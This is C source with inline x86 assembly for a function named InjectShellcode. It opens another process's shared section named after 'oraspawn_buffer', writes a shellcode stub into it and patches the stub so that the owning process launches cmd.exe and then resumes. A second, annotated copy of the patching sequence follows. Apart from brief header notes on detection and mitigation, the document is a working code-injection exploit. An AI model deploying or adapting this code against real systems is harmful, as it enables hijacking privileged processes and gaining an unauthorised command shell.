//-----------------------------------------------------------------------------
// BOOL InjectShellcode(DWORD oldEIP, CHAR *oSID)
//
// Writes a small position-independent x86 stub (the bytes between the
// Shellcode: and End: labels below) into an existing named section
// "Global\*oraspawn_buffer_<oSID>*" at offset 0x500 of the mapped view, then
// patches the stub in place:
//   [stub+0x0a]  address of CreateProcessA (resolved here via GetProcAddress)
//   [stub+0x0e]  oldEIP, the instruction pointer the stub returns to
//   CommandBuf   "cmd.exe", NUL-terminated
//   [stub+0x2f0] "WinSta0\Default", used as STARTUPINFO.lpDesktop
// The stub itself only runs inside the process that owns the section: it
// calls CreateProcessA("cmd.exe") with scratch PROCESS_INFORMATION /
// STARTUPINFO areas inside the same section and then returns to oldEIP.
//
// In:   oldEIP  EIP value the stub resumes at after CreateProcessA
//       oSID    suffix for the section name (at most 50 characters are used)
// Out:  TRUE after the stub has been written, FALSE if the section could not
//       be opened.
//
// The offsets used by the stub (-0x47, -0x4b, -0x4f relative to getDelta,
// +0x0a/+0x0e, 0x2f0, and the `xor bl, bl` base recovery) depend on the exact
// encoding of the placeholder instructions and on the stub being placed at
// view+0x500; do not restyle the _asm block without recomputing them.
//
// Security notes (review):
// - This is a code-injection primitive: it requires a section that this
//   process can open with FILE_MAP_WRITE and that the owning process maps
//   executable; with DEP/W^X on the owner's mapping the stub faults instead
//   of running.
// - Detection: a foreign process opening Global\*oraspawn_buffer_* with
//   write access, or a thread in the owner whose EIP points into that section.
// - Mitigation on the owner side: a restrictive DACL on the section rather
//   than the default security descriptor, and a mapping that is writable or
//   executable but not both.
//-----------------------------------------------------------------------------
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
    HMODULE hKernel;
    FARPROC pCreateProc;
    LPSTR sCommand="cmd.exe";                   // command line copied into CommandBuf
    DWORD dwStrLen;
    CHAR buff[100];                             // section name: 24 + <=50 + 1 + NUL fits
    dwStrLen=strlen(sCommand);
    hKernel=LoadLibrary("Kernel32.dll");
    pCreateProc=GetProcAddress(hKernel,"CreateProcessA"); // resolved here, patched into the stub below
    strcpy(buff, "Global\\*oraspawn_buffer_");
    strncat(buff, oSID,50);                     // at most 50 characters of oSID
    strcat(buff, "*");
    HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); // open the existing shared section by name
    if (hMapFile == NULL) {
        printf("Could not open Shared Section\n\n");
        return FALSE;
    }
    else
        printf("Shared Section opened\n");
    LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0); // map the whole section into this process
    printf("Inserting shellcode...\n");
    CHAR sWinSta[]="WinSta0\\Default";
    // copy the stub (Shellcode..End) into the section, then patch its fields
    _asm {
        pushad
        lea esi, Shellcode
        mov edi, lpMapAddress
        add edi, 0x500                          ; stub is placed at view+0x500
        lea ecx, End
        sub ecx, esi                            ; ecx = stub length (End - Shellcode)
        push esi                                ; keep esi/edi for the patching below
        push edi
        cld
        rep movsb                               ; copy the stub into the shared section
        pop edi
        pop esi
        push edi
        lea ecx, CommandBuf                     ; CommandBuf below holds the second argument of CreateProcessA
        sub ecx, esi                            ; ecx = offset of CommandBuf within the stub
        add edi, ecx
        mov esi, sCommand                       ; "cmd.exe"
        mov ecx, dwStrLen
        rep movsb                               ; copy "cmd.exe" into CommandBuf
        mov [edi], 0x00                         ; NUL terminator
        pop edi                                 ; edi = start of the stub in the section
        mov esi, pCreateProc
        mov [edi+0x0a], esi                     ; [edi+0x0a] holds the address of CreateProcessA
        mov esi, oldEIP
        mov [edi+0x0e], esi                     ; [edi+0x0e] holds the original EIP
        add edi, 0x2f0                          ; copy "WinSta0\Default" to [edi+0x2f0]
        lea esi, sWinSta
        mov ecx, 0xf                            ; 15 bytes of sWinSta
        cld
        rep movsb
        jmp Done
    Shellcode:
        jmp Start
        // this gets overwritten: 16 placeholder bytes, patched above at
        // +0x0a (CreateProcessA) and +0x0e (oldEIP)
        mov ax,0xffff                           ; placeholder
        mov ax,0xffff
        mov ax,0xffff
        mov ax,0xffff
    CommandBuf: // this gets overwritten
        mov dword ptr[eax],0x55555555           ; placeholder instructions never execute; the bytes are a buffer for "cmd.exe"
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
        mov dword ptr[eax],0x55555555
    Start:
        call getDelta
    getDelta:
        pop edx                                 // edx = address of getDelta inside the section (position-independent base)
        pushad
        mov eax, edx
        add eax, 0x200
        push eax                                // LPPROCESS_INFORMATION lpProcessInformation (scratch at edx+0x200)
        add eax, 0x200
        mov ebx, edx
        xor bl, bl                              ; ebx = start of the stub (relies on view+0x500 being 256-byte aligned)
        lea ecx, [ebx+0x2f0]                    ; -> "WinSta0\Default"
        lea ebx, [eax+0x8]                      ; STARTUPINFO.lpDesktop
        mov [ebx], ecx                          // set window station and desktop: fill STARTUPINFO.lpDesktop
        push eax                                // LPSTARTUPINFO lpStartupInfo (scratch at edx+0x400)
        push 0x0                                // lpCurrentDirectory
        push 0x0                                // lpEnvironment
        push 0x0                                // dwCreationFlags
        push 0x0                                // bInheritHandles
        push 0x0                                // lpThreadAttributes
        push 0x0                                // lpProcessAttributes
        lea eax, [edx-0x47]                     // "cmd.exe" (CommandBuf)
        push eax                                // lpCommandLine
        push 0x0                                // lpApplicationName
        call [edx-0x4f]                         // CreateProcessA, patched in at stub+0x0a
        popad
        push [edx-0x4b]                         // old thread EIP: resume the original code
        ret
    End:
    Done:
        popad
    }
    return TRUE;
}
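; Annotated excerpt of the _asm copy/patch sequence from InjectShellcode above
; (same instructions; only the comments differ).  Register roles:
;   esi = source (Shellcode in this image, then sCommand, then sWinSta)
;   edi = destination inside the mapped section (view + 0x500)
;   ecx = byte count for rep movsb
lea esi, Shellcode                      ; copy the stub into the shared section
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi                            ; ecx = End - Shellcode
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf                     ; fill the first patched field: "cmd.exe" at CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00
pop edi                                 ; back at the stub start; patch the pointer fields
mov esi, pCreateProc
mov [edi+0x0a], esi                     ; CreateProcessA address
mov esi, oldEIP
mov [edi+0x0e], esi                     ; saved EIP
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb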